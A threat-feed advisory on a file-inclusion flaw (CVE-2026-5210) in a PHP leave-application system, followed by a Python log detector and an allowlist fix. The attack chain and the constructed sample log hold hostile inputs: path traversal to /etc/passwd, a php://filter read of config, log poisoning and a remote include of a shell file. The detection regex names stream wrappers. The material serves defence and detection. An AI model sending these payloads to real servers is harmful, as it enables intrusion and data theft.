{"description":"Trending threats, MITRE ATT\u0026CK coverage, and detection metadata — refreshed continuously.","feed_url":"https://feed.craftedsignal.io/tags/cve-2026-5210/","home_page_url":"https://feed.craftedsignal.io/","items":[{"_cs_actors":[],"_cs_cves":[{"cvss":7.3,"id":"CVE-2026-5210"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["cve-2026-5210","file-inclusion","web-application"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eSourceCodester Leave Application System version 1.0 is vulnerable to file inclusion (CVE-2026-5210, CVSS 7.3). The application passes the value of the \u003ccode\u003epage\u003c/code\u003e request parameter to a file include without validating it, so a remote attacker can make the server include an arbitrary file by supplying a path in that parameter. Public exploit details are available, which raises the likelihood of attacks against exposed instances. Depending on what the attacker can include, the impact ranges from disclosure of configuration files and source code to remote code execution.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker identifies a page within the SourceCodester Leave Application System 1.0 that uses the \u003ccode\u003epage\u003c/code\u003e parameter to include files.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a request whose \u003ccode\u003epage\u003c/code\u003e value is a path to a local file (e.g., \u003ccode\u003e../../../../etc/passwd\u003c/code\u003e, possibly URL-encoded) or, if the PHP configuration permits it, a remote URL. Remote inclusion requires \u003ccode\u003eallow_url_include\u003c/code\u003e to be enabled, which is off by default in PHP; local inclusion needs no special configuration.\u003c/li\u003e\n\u003cli\u003eThe application uses the attacker-supplied \u003ccode\u003epage\u003c/code\u003e value without sanitization or validation.\u003c/li\u003e\n\u003cli\u003eThe application attempts to include the file specified by the attacker\u0026rsquo;s request.\u003c/li\u003e\n\u003cli\u003eIf the file is successfully included, the attacker can read sensitive information (e.g., \u003ccode\u003e/etc/passwd\u003c/code\u003e, database configuration files).\u003c/li\u003e\n\u003cli\u003eIf the attacker can get PHP code into a file that the web server user can read and then include it (e.g., by poisoning a web server log with PHP code), they achieve remote code execution on the server.\u003c/li\u003e\n\u003cli\u003eThe attacker executes arbitrary commands on the server with the privileges of the web server user.\u003c/li\u003e\n\u003cli\u003eThe attacker can then pivot to other systems, install malware, or exfiltrate sensitive data.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this vulnerability can lead to unauthorized access to sensitive information, such as configuration files, source code, and user credentials. Remote code execution is possible if the attacker can include a file containing PHP code, potentially leading to complete system compromise. 
This could impact all users of the Leave Application System, potentially exposing employee data.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eApply a vendor patch or upgrade to a fixed version of SourceCodester Leave Application System if one is available to remediate CVE-2026-5210; if no fixed version exists, modify the include so that the \u003ccode\u003epage\u003c/code\u003e value selects an entry from a fixed allowlist of page names rather than being used as a path.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule that accompanies this brief, or an equivalent rule, to detect exploitation attempts by flagging suspicious \u003ccode\u003epage\u003c/code\u003e parameter values in web server logs: directory traversal sequences (including URL-encoded forms), absolute paths, PHP stream wrappers such as \u003ccode\u003ephp://\u003c/code\u003e, and remote URLs.\u003c/li\u003e\n\u003cli\u003eImplement strict input validation for all user-supplied input, especially parameters used for file inclusion; an allowlist of expected values is the reliable control, since blocklisting traversal strings is routinely bypassed with encoding tricks.\u003c/li\u003e\n\u003cli\u003eRestrict file system access for the web server user to only the directories the application needs, so that a successful inclusion cannot reach system or credential files, and keep \u003ccode\u003eallow_url_include\u003c/code\u003e disabled (its default) to rule out remote inclusion.\u003c/li\u003e\n\u003cli\u003eMonitor web server logs for access to sensitive files, such as \u003ccode\u003e/etc/passwd\u003c/code\u003e, database configuration files, and application source code.\u003c/li\u003e\n\u003cli\u003eThe public write-up that documents the issue is at \u003ccode\u003ehttps://medium.com/@hemantrajbhati5555/local-file-inclusion-lfi-in-leave-application-system-php-sqlite3-4e095bb7ee40\u003c/code\u003e; it is a reference for validating detection coverage, not an attacker-controlled URL to block.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-31T19:16:29Z","date_published":"2026-03-31T19:16:29Z","id":"/briefs/2026-04-sourcecodester-lfi/","summary":"SourceCodester Leave Application System 1.0 is vulnerable to file inclusion (CVE-2026-5210) due to improper handling of the 'page' argument, allowing attackers to read sensitive files and potentially execute arbitrary code.","title":"SourceCodester Leave Application System 1.0 File Inclusion Vulnerability (CVE-2026-5210)","url":"https://feed.craftedsignal.io/briefs/2026-04-sourcecodester-lfi/"}],"language":"en","title":"CraftedSignal Threat Feed — Cve-2026-5210","version":"https://jsonfeed.org/version/1.1"}
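The `page`-parameter abuse described in the brief's attack chain, together with its recommendation to monitor web server logs for suspicious `page` values, as an added example that is not part of the brief and not code from the Leave Application System. It runs a detector over constructed combined-format log lines (the IP addresses, timestamps and requests are made up for the demonstration) and shows the allowlist lookup that removes the bug; the page names and the pages directory are assumed, not taken from the application.

```python
"""Detecting and preventing `page`-parameter file inclusion (added example).

Illustrative code, not part of the Leave Application System or of this brief:
scan_access_log() flags suspicious `page` values in constructed combined-format
web server log lines, and resolve_page() shows the allowlist lookup that removes
the bug. Log lines, IP addresses, page names and the pages directory are all
constructed for the demonstration.
"""
import posixpath
import re
from collections import Counter
from urllib.parse import parse_qs, unquote, urlsplit

# Apache/nginx combined format: ip ident user [time] "METHOD target PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)
# Schemes and PHP stream wrappers that make an include read source, fetch remote
# code or execute input instead of loading a page file.
SCHEME_RE = re.compile(r'^(?:https?|ftp|php|data|file|expect|zip|phar|glob)://', re.I)


def classify_page_value(value: str) -> list[str]:
    """Return the indicators found in one `page` value; an empty list means benign."""
    decoded = unquote(value)  # parse_qs already decoded once; this catches double encoding
    reasons = []
    if "\x00" in decoded:
        reasons.append("null-byte")
    if re.search(r"\.\.[\\/]", decoded):          # also matches filter-bypass forms like ....//
        reasons.append("traversal")
    if decoded.startswith("/"):
        reasons.append("absolute-path")
    if SCHEME_RE.match(decoded):
        reasons.append("wrapper-or-url")
    if re.search(r"\.(log|ini|conf|env|sqlite3?|db)$", decoded, re.I):
        reasons.append("sensitive-extension")
    return reasons


def scan_access_log(lines) -> list[dict]:
    """Return one finding per request whose `page` parameter looks like an inclusion attempt."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        query = urlsplit(m["target"]).query
        for value in parse_qs(query, keep_blank_values=True).get("page", []):
            reasons = classify_page_value(value)
            if reasons:
                findings.append({"ip": m["ip"], "time": m["time"], "status": int(m["status"]),
                                 "page": unquote(value), "reasons": reasons})
    return findings


def attempts_by_ip(findings) -> dict:
    """Count flagged requests per client, the first pivot an analyst wants."""
    return dict(Counter(f["ip"] for f in findings))


# --- Hardened include resolution (assumed page names and directory layout) ---------
ALLOWED_PAGES = {"home": "home.php", "apply": "apply.php", "leaves": "leaves.php"}  # constructed
PAGES_DIR = "/var/www/app/pages"                                                    # assumed


def resolve_page(page: str, base_dir: str = PAGES_DIR) -> str:
    """Map `page` to a file through an allowlist; the request value never becomes part of a path.
    Raises ValueError for anything not in the allowlist."""
    filename = ALLOWED_PAGES.get(page)
    if filename is None:
        raise ValueError(f"unknown page {page!r}")
    # Defence in depth: normalise and confirm the result is still under base_dir, so a
    # mistaken allowlist entry cannot reintroduce traversal.
    full = posixpath.normpath(posixpath.join(base_dir, filename))
    if not full.startswith(posixpath.normpath(base_dir) + "/"):
        raise ValueError("resolved path escapes the pages directory")
    return full


SAMPLE_LOG = [  # constructed sample traffic, not real log data
    '203.0.113.5 - - [31/Mar/2026:19:16:29 +0000] "GET /index.php?page=home HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [31/Mar/2026:19:16:31 +0000] "GET /index.php?page=../../../../etc/passwd HTTP/1.1" 200 1810 "-" "curl/8.4.0"',
    '203.0.113.5 - - [31/Mar/2026:19:16:33 +0000] "GET /index.php?page=%2e%2e%2f%2e%2e%2fvar%2flog%2fapache2%2faccess.log HTTP/1.1" 200 94022 "-" "curl/8.4.0"',
    '198.51.100.7 - - [31/Mar/2026:19:17:02 +0000] "GET /index.php?page=php://filter/convert.base64-encode/resource=config HTTP/1.1" 200 2210 "-" "python-requests/2.31"',
    '198.51.100.7 - - [31/Mar/2026:19:17:05 +0000] "GET /index.php?page=http://198.51.100.7/shell.txt HTTP/1.1" 500 0 "-" "python-requests/2.31"',
    '192.0.2.9 - - [31/Mar/2026:19:18:00 +0000] "GET /index.php?page=leaves HTTP/1.1" 200 4001 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    hits = scan_access_log(SAMPLE_LOG)
    for f in hits:
        print(f'{f["time"]} {f["ip"]} status={f["status"]} page={f["page"]!r} {",".join(f["reasons"])}')
    print("attempts by ip:", attempts_by_ip(hits))
    for candidate in ("home", "../../../../etc/passwd"):
        try:
            print(candidate, "->", resolve_page(candidate))
        except ValueError as exc:
            print(candidate, "-> rejected:", exc)
```

The detector deliberately flags on the decoded value rather than on raw strings, which is how URL-encoded and double-encoded traversal slips past naive substring rules; a 200 response to a flagged request is the signal that the include actually succeeded, whereas a 500 (as in the remote URL line) usually means the include failed, for example because `allow_url_include` is off. The resolver never concatenates the request value into a path at all, which is the fix the brief's validation recommendation amounts to in practice.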